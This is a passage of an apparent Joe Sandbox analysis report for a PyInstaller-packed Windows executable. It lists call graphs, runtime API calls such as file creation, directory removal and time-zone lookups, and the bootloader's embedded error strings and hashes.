19253->19254 19257 7ff6404f4894 19254->19257 19255->19253 19259 7ff6404f9c58 __free_lconv_num 11 API calls 19255->19259 19262 7ff6404f48b5 19255->19262 19263 7ff6404f48c2 19255->19263 19256 7ff6404febb0 _fread_nolock MultiByteToWideChar 19261 7ff6404f4906 19256->19261 19258 7ff6404f43f4 _set_fmode 11 API calls 19257->19258 19258->19247 19259->19262 19260 7ff6404fc90c _fread_nolock 12 API calls 19260->19263 19261->19247 19261->19253 19262->19260 19263->19247 19263->19256 19265 7ff6404f853d 19264->19265 19276 7ff6404f8539 19264->19276 19285 7ff640501d4c GetEnvironmentStringsW 19265->19285 19268 7ff6404f854a 19270 7ff6404f9c58 __free_lconv_num 11 API calls 19268->19270 19269 7ff6404f8556 19292 7ff6404f86a4 19269->19292 19270->19276 19273 7ff6404f9c58 __free_lconv_num 11 API calls 19274 7ff6404f857d 19273->19274 19275 7ff6404f9c58 __free_lconv_num 11 API calls 19274->19275 19275->19276 19276->18920 19277 7ff6404f88e4 19276->19277 19282 7ff6404f8907 19277->19282 19283 7ff6404f891e 19277->19283 19278 7ff6404febb0 MultiByteToWideChar _fread_nolock 19278->19283 19279 7ff6404fdea8 _set_fmode 11 API calls 19279->19283 19280 7ff6404f8992 19281 7ff6404f9c58 __free_lconv_num 11 API calls 19280->19281 19281->19282 19282->18920 19283->19278 19283->19279 19283->19280 19283->19282 19284 7ff6404f9c58 __free_lconv_num 11 API calls 19283->19284 19284->19283 19286 7ff6404f8542 19285->19286 19287 7ff640501d70 19285->19287 19286->19268 19286->19269 19288 7ff6404fc90c _fread_nolock 12 API calls 19287->19288 19289 7ff640501da7 memcpy_s 19288->19289 19290 7ff6404f9c58 __free_lconv_num 11 API calls 19289->19290 19291 7ff640501dc7 FreeEnvironmentStringsW 19290->19291 19291->19286 19293 7ff6404f86cc 19292->19293 19294 7ff6404fdea8 _set_fmode 11 API calls 19293->19294 19307 7ff6404f8707 19294->19307 19295 7ff6404f870f 19296 7ff6404f9c58 __free_lconv_num 11 API calls 19295->19296 19298 7ff6404f855e 19296->19298 19297 7ff6404f8789 19299 7ff6404f9c58 __free_lconv_num 11 API calls 19297->19299 19298->19273 19299->19298 19300 7ff6404fdea8 _set_fmode 11 API calls 19300->19307 19301 7ff6404f8778 19303 7ff6404f87c0 11 API calls 19301->19303 19302 7ff6404ff784 37 API calls 19302->19307 19304 7ff6404f8780 19303->19304 19305 7ff6404f9c58 __free_lconv_num 11 API calls 19304->19305 19305->19295 19306 7ff6404f87ac 19308 7ff6404f9c10 _isindst 17 API calls 19306->19308 19307->19295 19307->19297 19307->19300 19307->19301 19307->19302 19307->19306 19309 7ff6404f9c58 __free_lconv_num 11 API calls 19307->19309 19310 7ff6404f87be 19308->19310 19309->19307 19313 7ff640507e41 __crtLCMapStringW 19311->19313 19312 7ff6405063fe 19312->18946 19312->18947 19313->19312 19314 7ff6404fe278 6 API calls 19313->19314 19314->19312

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 00007FF6404E1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 0 7ff6404e1000-7ff6404e3536 call 7ff6404ef138 call 7ff6404ef140 call 7ff6404ebb70 call 7ff6404f4700 call 7ff6404f4794 call 7ff6404e33e0 14 7ff6404e3544-7ff6404e3566 call 7ff6404e18f0 0->14 15 7ff6404e3538-7ff6404e353f 0->15 21 7ff6404e356c-7ff6404e3583 call 7ff6404e1bf0 14->21 22 7ff6404e3736-7ff6404e374c call 7ff6404e3f70 14->22 16 7ff6404e371a-7ff6404e3735 call 7ff6404eb870 15->16 26 7ff6404e3588-7ff6404e35c1 21->26 27 7ff6404e3785-7ff6404e379a call 7ff6404e25f0 22->27 28 7ff6404e374e-7ff6404e377b call 7ff6404e76a0 22->28 29 7ff6404e3653-7ff6404e366d call 7ff6404e7e10 26->29 30 7ff6404e35c7-7ff6404e35cb 26->30 44 7ff6404e3712 27->44 41 7ff6404e379f-7ff6404e37be call 7ff6404e1bf0 28->41 42 7ff6404e377d-7ff6404e3780 call 7ff6404ef36c 28->42 45 7ff6404e3695-7ff6404e369c 29->45 46 7ff6404e366f-7ff6404e3675 29->46 34 7ff6404e35cd-7ff6404e35e5 call 7ff6404f4560 30->34 35 7ff6404e3638-7ff6404e364d call 7ff6404e18e0 30->35 54 7ff6404e35f2-7ff6404e360a call 7ff6404f4560 34->54 55 7ff6404e35e7-7ff6404e35eb 34->55 35->29 35->30 64 7ff6404e37c1-7ff6404e37ca 41->64 42->27 44->16 48 7ff6404e36a2-7ff6404e36c0 call 7ff6404e7e10 call 7ff6404e7f80 45->48 49 7ff6404e3844-7ff6404e3863 call 7ff6404e3e90 45->49 52 7ff6404e3682-7ff6404e3690 call 7ff6404f415c 46->52 53 7ff6404e3677-7ff6404e3680 46->53 78 7ff6404e380f-7ff6404e381e call 7ff6404e8400 48->78 79 7ff6404e36c6-7ff6404e36c9 48->79 69 7ff6404e3865-7ff6404e386f call 7ff6404e3fe0 49->69 70 7ff6404e3871-7ff6404e3882 call 7ff6404e1bf0 49->70 52->45 53->52 66 7ff6404e360c-7ff6404e3610 54->66 67 7ff6404e3617-7ff6404e362f call 7ff6404f4560 54->67 55->54 64->64 65 7ff6404e37cc-7ff6404e37e9 call 7ff6404e18f0 64->65 65->26 82 7ff6404e37ef-7ff6404e3800 call 7ff6404e25f0 65->82 66->67 67->35 83 7ff6404e3631 67->83 81 7ff6404e3887-7ff6404e38a1 call 7ff6404e86b0 69->81 70->81 93 7ff6404e3820 78->93 94 7ff6404e382c-7ff6404e382f call 7ff6404e7c40 78->94 79->78 84 7ff6404e36cf-7ff6404e36f6 call 7ff6404e1bf0 79->84 95 7ff6404e38a3 81->95 96 7ff6404e38af-7ff6404e38c1 SetDllDirectoryW 81->96 82->44 83->35 99 7ff6404e3805-7ff6404e380d call 7ff6404f415c 84->99 100 7ff6404e36fc-7ff6404e3703 call 7ff6404e25f0 84->100 93->94 102 7ff6404e3834-7ff6404e3836 94->102 95->96 97 7ff6404e38c3-7ff6404e38ca 96->97 98 7ff6404e38d0-7ff6404e38ec call 7ff6404e6560 call 7ff6404e6b00 96->98 97->98 103 7ff6404e3a50-7ff6404e3a58 97->103 118 7ff6404e38ee-7ff6404e38f4 98->118 119 7ff6404e3947-7ff6404e394a call 7ff6404e6510 98->119 99->81 110 7ff6404e3708-7ff6404e370a 100->110 102->81 107 7ff6404e3838 102->107 111 7ff6404e3a5a-7ff6404e3a77 PostMessageW GetMessageW 103->111 112 7ff6404e3a7d-7ff6404e3aaf call 7ff6404e33d0 call 7ff6404e3080 call 7ff6404e33a0 call 7ff6404e6780 call 7ff6404e6510 103->112 107->49 110->44 111->112 121 7ff6404e390e-7ff6404e3918 call 7ff6404e6970 118->121 122 7ff6404e38f6-7ff6404e3903 call 7ff6404e65a0 118->122 126 7ff6404e394f-7ff6404e3956 119->126 135 7ff6404e3923-7ff6404e3931 call 7ff6404e6cd0 121->135 136 7ff6404e391a-7ff6404e3921 121->136 122->121 133 7ff6404e3905-7ff6404e390c 122->133 126->103 130 7ff6404e395c-7ff6404e3966 call 7ff6404e30e0 126->130 130->110 144 7ff6404e396c-7ff6404e3980 call 7ff6404e83e0 130->144 137 7ff6404e393a-7ff6404e3942 call 7ff6404e2870 call 7ff6404e6780 133->137 135->126 145 7ff6404e3933 135->145 136->137 137->119 151 7ff6404e3982-7ff6404e399f PostMessageW GetMessageW 144->151 152 7ff6404e39a5-7ff6404e39e1 call 7ff6404e7f20 call 7ff6404e7fc0 call 7ff6404e6780 call 7ff6404e6510 call 7ff6404e7ec0 144->152 145->137 151->152 162 7ff6404e39e6-7ff6404e39e8 152->162 163 7ff6404e39ea-7ff6404e3a00 call 7ff6404e81f0 call 7ff6404e7ec0 162->163 164 7ff6404e3a3d-7ff6404e3a4b call 7ff6404e18a0 162->164 163->164 171 7ff6404e3a02-7ff6404e3a10 163->171 164->110 172 7ff6404e3a12-7ff6404e3a2c call 7ff6404e25f0 call 7ff6404e18a0 171->172 173 7ff6404e3a31-7ff6404e3a38 call 7ff6404e2870 171->173 172->110 173->164
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModuleName
                                                                                                                                                                                                                                                            • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                            • API String ID: 514040917-585287483
                                                                                                                                                                                                                                                            • Opcode ID: 24eb870da8ca21e580c9e75daa874e24e3f9aac631933096159888eb5afdb10b
                                                                                                                                                                                                                                                            • Instruction ID: b41771169caa7e53486d63186ad72cddfcc7f537cb3ea71f10036f4f1d67ffa6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24eb870da8ca21e580c9e75daa874e24e3f9aac631933096159888eb5afdb10b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF17B61A0C6A2F1FA1AFB21D5582FD62A1EF95784F844032DA5DC37D6EF2CE558C380
                                                                                                                                                                                                                                                            Function 00007FF640504F10 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 305 7ff640504f10-7ff640504f4b call 7ff640504898 call 7ff6405048a0 call 7ff640504908 312 7ff640505175-7ff6405051c1 call 7ff6404f9c10 call 7ff640504898 call 7ff6405048a0 call 7ff640504908 305->312 313 7ff640504f51-7ff640504f5c call 7ff6405048a8 305->313 338 7ff6405052ff-7ff64050536d call 7ff6404f9c10 call 7ff640500888 312->338 339 7ff6405051c7-7ff6405051d2 call 7ff6405048a8 312->339 313->312 319 7ff640504f62-7ff640504f6c 313->319 321 7ff640504f8e-7ff640504f92 319->321 322 7ff640504f6e-7ff640504f71 319->322 324 7ff640504f95-7ff640504f9d 321->324 323 7ff640504f74-7ff640504f7f 322->323 327 7ff640504f81-7ff640504f88 323->327 328 7ff640504f8a-7ff640504f8c 323->328 324->324 329 7ff640504f9f-7ff640504fb2 call 7ff6404fc90c 324->329 327->323 327->328 328->321 331 7ff640504fbb-7ff640504fc9 328->331 336 7ff640504fb4-7ff640504fb6 call 7ff6404f9c58 329->336 337 7ff640504fca-7ff640504fd6 call 7ff6404f9c58 329->337 336->331 347 7ff640504fdd-7ff640504fe5 337->347 358 7ff64050536f-7ff640505376 338->358 359 7ff64050537b-7ff64050537e 338->359 339->338 348 7ff6405051d8-7ff6405051e3 call 7ff6405048d8 339->348 347->347 350 7ff640504fe7-7ff640504ff8 call 7ff6404ff784 347->350 348->338 357 7ff6405051e9-7ff64050520c call 7ff6404f9c58 GetTimeZoneInformation 348->357 350->312 360 7ff640504ffe-7ff640505054 call 7ff6405097e0 * 4 call 7ff640504e2c 350->360 376 7ff6405052d4-7ff6405052fe call 7ff640504890 call 7ff640504880 call 7ff640504888 357->376 377 7ff640505212-7ff640505233 357->377 365 7ff64050540b-7ff64050540e 358->365 362 7ff6405053b5-7ff6405053c8 call 7ff6404fc90c 359->362 363 7ff640505380 359->363 418 7ff640505056-7ff64050505a 360->418 381 7ff6405053d3-7ff6405053ee call 7ff640500888 362->381 382 7ff6405053ca 362->382 367 7ff640505383 363->367 365->367 368 7ff640505414-7ff64050541c call 7ff640504f10 365->368 372 7ff640505388-7ff6405053b4 call 7ff6404f9c58 call 7ff6404eb870 367->372 373 7ff640505383 call 7ff64050518c 367->373 368->372 373->372 383 7ff640505235-7ff64050523b 377->383 384 7ff64050523e-7ff640505245 377->384 404 7ff6405053f5-7ff640505407 call 7ff6404f9c58 381->404 405 7ff6405053f0-7ff6405053f3 381->405 392 7ff6405053cc-7ff6405053d1 call 7ff6404f9c58 382->392 383->384 386 7ff640505259 384->386 387 7ff640505247-7ff64050524f 384->387 398 7ff64050525b-7ff6405052cf call 7ff6405097e0 * 4 call 7ff640501e6c call 7ff640505424 * 2 386->398 387->386 393 7ff640505251-7ff640505257 387->393 392->363 393->398 398->376 404->365 405->392 420 7ff640505060-7ff640505064 418->420 421 7ff64050505c 418->421 420->418 423 7ff640505066-7ff64050508b call 7ff6404f5e68 420->423 421->420 428 7ff64050508e-7ff640505092 423->428 430 7ff640505094-7ff64050509f 428->430 431 7ff6405050a1-7ff6405050a5 428->431 430->431 433 7ff6405050a7-7ff6405050ab 430->433 431->428 435 7ff6405050ad-7ff6405050d5 call 7ff6404f5e68 433->435 436 7ff64050512c-7ff640505130 433->436 445 7ff6405050f3-7ff6405050f7 435->445 446 7ff6405050d7 435->446 438 7ff640505132-7ff640505134 436->438 439 7ff640505137-7ff640505144 436->439 438->439 441 7ff64050515f-7ff64050516e call 7ff640504890 call 7ff640504880 439->441 442 7ff640505146-7ff64050515c call 7ff640504e2c 439->442 441->312 442->441 445->436 451 7ff6405050f9-7ff640505117 call 7ff6404f5e68 445->451 449 7ff6405050da-7ff6405050e1 446->449 449->445 452 7ff6405050e3-7ff6405050f1 449->452 457 7ff640505123-7ff64050512a 451->457 452->445 452->449 457->436 458 7ff640505119-7ff64050511d 457->458 458->436 459 7ff64050511f 458->459 459->457
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF640504F55
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6405048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048BC
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6404F9BEF,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404F9C19
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6404F9BEF,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404F9C3E
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF640504F44
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF640504908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64050491C
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051BA
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051CB
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051DC
                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64050541C), ref: 00007FF640505203
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                            • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                            • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                                                            • Instruction ID: 7e4a4c9c830baa433aa96951ff4f0cbac14d7fc1549b2dded7bfed066c782698
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3D1C176E1C262A6E728FF21D6502BE6391EF46788F448035EA6D87786DF3CE841C740
                                                                                                                                                                                                                                                            Function 00007FF640505C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 490 7ff640505c74-7ff640505ce7 call 7ff6405059a8 493 7ff640505d01-7ff640505d0b call 7ff6404f7830 490->493 494 7ff640505ce9-7ff640505cf2 call 7ff6404f43d4 490->494 499 7ff640505d0d-7ff640505d24 call 7ff6404f43d4 call 7ff6404f43f4 493->499 500 7ff640505d26-7ff640505d8f CreateFileW 493->500 501 7ff640505cf5-7ff640505cfc call 7ff6404f43f4 494->501 499->501 504 7ff640505d91-7ff640505d97 500->504 505 7ff640505e0c-7ff640505e17 GetFileType 500->505 512 7ff640506042-7ff640506062 501->512 510 7ff640505dd9-7ff640505e07 GetLastError call 7ff6404f4368 504->510 511 7ff640505d99-7ff640505d9d 504->511 507 7ff640505e6a-7ff640505e71 505->507 508 7ff640505e19-7ff640505e54 GetLastError call 7ff6404f4368 CloseHandle 505->508 515 7ff640505e73-7ff640505e77 507->515 516 7ff640505e79-7ff640505e7c 507->516 508->501 524 7ff640505e5a-7ff640505e65 call 7ff6404f43f4 508->524 510->501 511->510 517 7ff640505d9f-7ff640505dd7 CreateFileW 511->517 522 7ff640505e82-7ff640505ed7 call 7ff6404f7748 515->522 516->522 523 7ff640505e7e 516->523 517->505 517->510 529 7ff640505ed9-7ff640505ee5 call 7ff640505bb0 522->529 530 7ff640505ef6-7ff640505f27 call 7ff640505728 522->530 523->522 524->501 529->530 535 7ff640505ee7 529->535 536 7ff640505f2d-7ff640505f6f 530->536 537 7ff640505f29-7ff640505f2b 530->537 538 7ff640505ee9-7ff640505ef1 call 7ff6404f9dd0 535->538 539 7ff640505f91-7ff640505f9c 536->539 540 7ff640505f71-7ff640505f75 536->540 537->538 538->512 543 7ff640505fa2-7ff640505fa6 539->543 544 7ff640506040 539->544 540->539 542 7ff640505f77-7ff640505f8c 540->542 542->539 543->544 546 7ff640505fac-7ff640505ff1 CloseHandle CreateFileW 543->546 544->512 547 7ff640505ff3-7ff640506021 GetLastError call 7ff6404f4368 call 7ff6404f7970 546->547 548 7ff640506026-7ff64050603b 546->548 547->548 548->544
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                                                            • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                                            • Instruction ID: 96457cfd391f5a6e961bd355bdc95e6a6cce5f6f06dd05e2cbaebf67e8b3e16c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BC1DF32B2CA5296EB14FF68C5906AD3765FB8AB98B010235DF2E97794CF38E551C300
                                                                                                                                                                                                                                                            Function 00007FF6404E79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7A1B
                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7A9E
                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ABD
                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ACB
                                                                                                                                                                                                                                                            • FindClose.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ADC
                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7AE5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                                            • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                            • Opcode ID: 28b17b752644ad79b76fdaecccd908953f702e209cd2b6248263d266171aeab9
                                                                                                                                                                                                                                                            • Instruction ID: 135ee184f5db4f079a8e8967783671618695dee313c272bd813e7931e680f166
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28b17b752644ad79b76fdaecccd908953f702e209cd2b6248263d266171aeab9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A417321A0C562E5EA20FB24E5949BD6360FFA5764F440632D9ADC37D4DF3CE64AC780
                                                                                                                                                                                                                                                            Function 00007FF64050518C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 840 7ff64050518c-7ff6405051c1 call 7ff640504898 call 7ff6405048a0 call 7ff640504908 847 7ff6405052ff-7ff64050536d call 7ff6404f9c10 call 7ff640500888 840->847 848 7ff6405051c7-7ff6405051d2 call 7ff6405048a8 840->848 860 7ff64050536f-7ff640505376 847->860 861 7ff64050537b-7ff64050537e 847->861 848->847 853 7ff6405051d8-7ff6405051e3 call 7ff6405048d8 848->853 853->847 859 7ff6405051e9-7ff64050520c call 7ff6404f9c58 GetTimeZoneInformation 853->859 874 7ff6405052d4-7ff6405052fe call 7ff640504890 call 7ff640504880 call 7ff640504888 859->874 875 7ff640505212-7ff640505233 859->875 865 7ff64050540b-7ff64050540e 860->865 862 7ff6405053b5-7ff6405053c8 call 7ff6404fc90c 861->862 863 7ff640505380 861->863 878 7ff6405053d3-7ff6405053ee call 7ff640500888 862->878 879 7ff6405053ca 862->879 866 7ff640505383 863->866 865->866 867 7ff640505414-7ff64050541c call 7ff640504f10 865->867 870 7ff640505388-7ff6405053b4 call 7ff6404f9c58 call 7ff6404eb870 866->870 871 7ff640505383 call 7ff64050518c 866->871 867->870 871->870 880 7ff640505235-7ff64050523b 875->880 881 7ff64050523e-7ff640505245 875->881 899 7ff6405053f5-7ff640505407 call 7ff6404f9c58 878->899 900 7ff6405053f0-7ff6405053f3 878->900 888 7ff6405053cc-7ff6405053d1 call 7ff6404f9c58 879->888 880->881 883 7ff640505259 881->883 884 7ff640505247-7ff64050524f 881->884 893 7ff64050525b-7ff6405052cf call 7ff6405097e0 * 4 call 7ff640501e6c call 7ff640505424 * 2 883->893 884->883 889 7ff640505251-7ff640505257 884->889 888->863 889->893 893->874 899->865 900->888
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051BA
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF640504908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64050491C
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051CB
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6405048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048BC
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051DC
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6405048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048EC
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
